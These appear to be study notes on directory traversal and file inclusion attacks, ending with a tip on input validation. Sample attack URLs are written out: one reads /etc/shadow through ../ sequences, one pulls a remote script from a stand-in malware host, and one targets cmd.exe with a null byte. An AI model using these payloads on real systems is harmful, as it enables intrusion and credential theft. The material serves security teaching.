• An injection attack occurs when the attacker inserts malicious code through an application interface
• Application attack that allows access to commands, files, and directories that may or may not be connected to the web document root directory

**<http://cat-bounce.com/../../../../etc/shadow**>
Unix systems use **../**
Windows systems use **..\\** by default but may also accept the Unix like **../**

• Directory traversals may be used to access any file on a system with the right permissions
• Attackers may use encoding to hide directory traversal attempts (%2e%2e%2f represents ../)

File Inclusion

• Web application vulnerability that allows an attacker either to download a file from an arbitrary location on the host file system or to upload an executable or script file to open a backdoor

Remote File Inclusion

• An attacker executes a script to inject a remote file into the web app or website

<https://cat-bounce.com/login.php?user=http://malware.bad/malicious.php>

Local File Inclusion

• An attacker adds a file to the web app or website that already exists on the hosting server

<https://cat-bounce.com/login.php?user=../../Windows/System32/cmd.exe%00>

• Logs containing ../ pertain to directory traversal attacks

To prevent directory traversals and file inclusion attacks, use proper input validation